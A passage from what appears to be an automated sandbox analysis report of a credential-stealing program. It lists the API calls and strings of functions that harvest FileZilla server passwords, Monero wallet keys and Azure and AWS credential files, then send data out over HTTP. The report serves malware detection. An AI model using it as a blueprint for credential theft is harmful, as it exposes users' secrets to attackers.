                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00130DBF,00130DBE,00130DBB,00130DBA), ref: 001204C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001204C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 001204E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001204F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0012052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 0012053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00120579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001205C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001205D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 0012067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001206AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001206C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 001206D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 001206E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 001206F3
                                      • lstrcat.KERNEL32(?,00131770), ref: 00120702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120715
                                      • lstrcat.KERNEL32(?,00131774), ref: 00120724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00120733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120746
                                      • lstrcat.KERNEL32(?,00131780), ref: 00120755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00120764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120777
                                      • lstrcat.KERNEL32(?,00131790), ref: 00120786
                                      • lstrcat.KERNEL32(?,00131794), ref: 00120795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001207EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 1ce2b2716344e92bf398105669ad08f1a8a23e3f5f48f649d138e9cb7e932aa6
                                      • Instruction ID: a2b134e9c8f512d8efcde61c4fbd09eb09a4fffb8d2b3b404249dcb9f609ccaf
                                      • Opcode Fuzzy Hash: 1ce2b2716344e92bf398105669ad08f1a8a23e3f5f48f649d138e9cb7e932aa6
                                      • Instruction Fuzzy Hash: 2AD11F71D10218ABDB15EBE0ED96EEE777DAF28300F808558F502B7095EF34AA54CB61
                                      Function 001159B0 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00115A48
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00115A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00115BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3F9D0,00000000,?,00E3ED58,00000000,?,00131B4C), ref: 00115EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00115ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00115EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00115EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00115EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00115F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00115F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00115F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00115F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00115F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00116000
                                      • InternetCloseHandle.WININET(00000000), ref: 0011600D
                                      • HttpOpenRequestA.WININET(00000000,00E3F920,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 00115C48
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00116017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------$X
                                      • API String ID: 874700897-4062443838
                                      • Opcode ID: f573ad575d09906958e1edc1b1978650b4a12867ae156a901619ddcd8fd20c77
                                      • Instruction ID: 075f60a9d585cf0c8a1c2ad4615b85f144014dc17ebb44e32bb7e9dc31e3fa1e
                                      • Opcode Fuzzy Hash: f573ad575d09906958e1edc1b1978650b4a12867ae156a901619ddcd8fd20c77
                                      • Instruction Fuzzy Hash: DA12F071920128ABCB15EBA0ECA6FEEB37DBF24700F804599F10676091EF706A58CF55
                                      Function 0011CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0011D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0011D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D308
                                      • lstrcat.KERNEL32(?,00131570), ref: 0011D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D32A
                                      • lstrcat.KERNEL32(?,00131574), ref: 0011D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D34C
                                      • lstrcat.KERNEL32(?,00131578), ref: 0011D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D36E
                                      • lstrcat.KERNEL32(?,0013157C), ref: 0011D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D390
                                      • lstrcat.KERNEL32(?,00131580), ref: 0011D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D3B2
                                      • lstrcat.KERNEL32(?,00131584), ref: 0011D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D3D4
                                      • lstrcat.KERNEL32(?,00131588), ref: 0011D3E3
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                      • lstrlen.KERNEL32(?), ref: 0011D42A
                                      • lstrlen.KERNEL32(?), ref: 0011D439
                                        • Part of subcall function 0012AD80: StrCmpCA.SHLWAPI(00000000,00131568,0011D2A2,00131568,00000000), ref: 0012AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 6b40eeddba9c13b408ff67706e48a08564c4cc897dd0eed2de8a9816e28af188
                                      • Instruction ID: b655e5479f22142854326cf6189728a195bba82d7e27eadfeb4a556c6f0bdd6e
                                      • Opcode Fuzzy Hash: 6b40eeddba9c13b408ff67706e48a08564c4cc897dd0eed2de8a9816e28af188
                                      • Instruction Fuzzy Hash: 9FE13171910118ABCB15EBA0ED96EEE733DAF64301F904658F606770A1DF31BE58CB62
                                      Function 0011CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3DE20,00000000,?,00131544,00000000,?,?), ref: 0011CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0011CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0011CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0011CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0011CBD9
                                      • StrStrA.SHLWAPI(?,00E3DE98,00130B56), ref: 0011CBF7
                                      • StrStrA.SHLWAPI(00000000,00E3DDA8), ref: 0011CC1E
                                      • StrStrA.SHLWAPI(?,00E3E700,00000000,?,00131550,00000000,?,00000000,00000000,?,00E39260,00000000,?,0013154C,00000000,?), ref: 0011CDA2
                                      • StrStrA.SHLWAPI(00000000,00E3E3C0), ref: 0011CDB9
                                        • Part of subcall function 0011C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0011C971
                                        • Part of subcall function 0011C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0011C97C
                                      • StrStrA.SHLWAPI(?,00E3E3C0,00000000,?,00131554,00000000,?,00000000,00E39230), ref: 0011CE5A
                                      • StrStrA.SHLWAPI(00000000,00E39470), ref: 0011CE71
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B47), ref: 0011CA43
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B4B), ref: 0011CA57
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B4E), ref: 0011CA78
                                      • lstrlen.KERNEL32(00000000), ref: 0011CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 0011CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 1853dfed1c909856f5608782d21122d6a4d7c3fc00d108af70d4bc2a7d876bb9
                                      • Instruction ID: a1131fff776ff8c969151d4284810fd4a2e883f419f702d543d4d6834fe15113
                                      • Opcode Fuzzy Hash: 1853dfed1c909856f5608782d21122d6a4d7c3fc00d108af70d4bc2a7d876bb9
                                      • Instruction Fuzzy Hash: E2E10C71900118ABCB15EBA4ECA2FEEB779BF64300F4045A9F506B7191EF307A59CB61
                                      Function 001284B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,00E39030,00000000,00020019,00000000,001305BE), ref: 00128534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001285B6
                                      • wsprintfA.USER32 ref: 001285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0012860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0012861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128629
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 4f17059db99508a43c7cda4b278710d844cec4af9c133b0ed44fc20ae2e1be13
                                      • Instruction ID: 35a50cf11d3c0e52a81f3483067cbf93b5d70a988b3198c40361b0b33722b17c
                                      • Opcode Fuzzy Hash: 4f17059db99508a43c7cda4b278710d844cec4af9c133b0ed44fc20ae2e1be13
                                      • Instruction Fuzzy Hash: 08812A71911228ABDB28DB54DD95FEAB7BCBF18300F5086D8F109A6180DF706B94CFA0
                                      Function 00124FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00125000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 0012501D
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 0012508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 001250A9
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00125118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00125135
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C00
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,001308D3), ref: 00124C15
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C32
                                        • Part of subcall function 00124B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00124C6E
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00E3F910), ref: 00124C9A
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE0), ref: 00124CAC
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CC0
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE4), ref: 00124CD2
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CE6
                                        • Part of subcall function 00124B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00124CFC
                                        • Part of subcall function 00124B60: DeleteFileA.KERNEL32(?), ref: 00124D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 12100af891a078a78ac2447e41a5bf7f720408414bc8c60c2328f0cc35dbeecf
                                      • Instruction ID: 1517717e425a7eb1de87efa1461230ea525bef9a768f62540d9ba164bb00f078
                                      • Opcode Fuzzy Hash: 12100af891a078a78ac2447e41a5bf7f720408414bc8c60c2328f0cc35dbeecf
                                      • Instruction Fuzzy Hash: 3F41A0BAA4021867DB64E770EC97FDD733C9B64700F404994B649A60C1EFB4A7D88B92
                                      Function 001291A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001291FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
